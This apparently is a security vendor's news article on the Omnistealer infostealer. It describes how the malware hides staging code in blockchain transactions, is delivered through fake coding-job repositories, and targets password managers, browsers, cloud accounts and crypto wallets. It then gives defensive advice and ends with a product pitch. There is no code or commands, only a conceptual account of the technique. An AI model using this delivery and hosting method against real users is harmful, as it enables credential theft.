A new infostealer dubbed Omnistealer is turning the blockchain into a permanent malware hosting platform, which is bad news for both companies and everyday users.
It’s pretty common for malware to store its payload on a public platform, ideally one that adds some trustworthiness to the download location, like Google docs, OneDrive, GitHub, npm, PyPI, and so on.
The problem for malware peddlers is that these can be taken down. It can sometimes take a while and a lot of trouble, but it’s possible. Omnistealer gets around this by storing its staging code inside transactions on public blockchains like TRON, Aptos, and Binance Smart Chain.
Some blockchain transactions allow small bits of arbitrary data (notes, metadata, smart contract inputs) and instead of something harmless, attackers insert:
- Encrypted text
- Encoded commands
- Pieces of malware code
And because blockchains are append‑only, those malicious snippets are effectively undeletable once they’re mined into a block. You can revoke domains and pull GitHub repos, but you can’t roll back TRON or BSC just to remove a few hundred bytes of malware staging code.
That turns public ledgers into a resilient, censorship‑resistant command and control infrastructure that defenders can’t simply take down.
Despite the obvious connection to cryptocurrency, Omnistealer is not solely about robbing crypto-investors. Once Omnistealer lands on a system, it goes after:
- More than 10 password managers, including cloud‑synced consumer tools such as LastPass.
- Major browsers like Chrome and Firefox, scraping saved logins and session data.
- Cloud storage accounts, including Google Drive credentials.
- Over 60 browser‑based crypto wallets, including popular extensions like MetaMask and Coinbase Wallet.
It’s designed to be a one‑stop data vacuum that investigators say will “literally steal everything.“
The attack typically starts with a “simple” coding gig: a contractor gets a LinkedIn or Upwork offer, pulls a GitHub repository, and runs what looks like normal project code. Behind the scenes, that code reaches out to the blockchain, reads transaction data, and uses it as a pointer to fetch and decrypt the final payload.
Researchers estimate that roughly 300,000 credentials have already been compromised, spanning everything from adult‑industry platforms and food delivery to financial compliance firms, defense suppliers, and US government entities.
You can’t delete malware from the blockchain, but you can make it much harder for campaigns like this to affect you. First, reduce what’s available to steal. Then protect your information better.
- Treat “dream job” and unsolicited contract offers as suspicious by default, especially if they move quickly to off‑platform chats (Telegram, Discord) or ask you to run code from a private repository.
- Lock down your passwords with a reputable password manager and turn on multi-factor authentication (preferring app or key over SMS) for any important or sensitive account.
- Use an up-to-date, real-time anti-malware solution to block, detect, and remove threats like Omnistealer.
- Don’t use your everyday user profile or main workstation as a test bench for random GitHub projects or side gigs. Use a virtual machine or separate system instead.
- Watch your crypto and banking accounts for unexplained logins or withdrawals, and move funds to new wallets if you suspect compromise.
We don’t just report on threats—we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your, and your family’s, personal information by using identity protection.
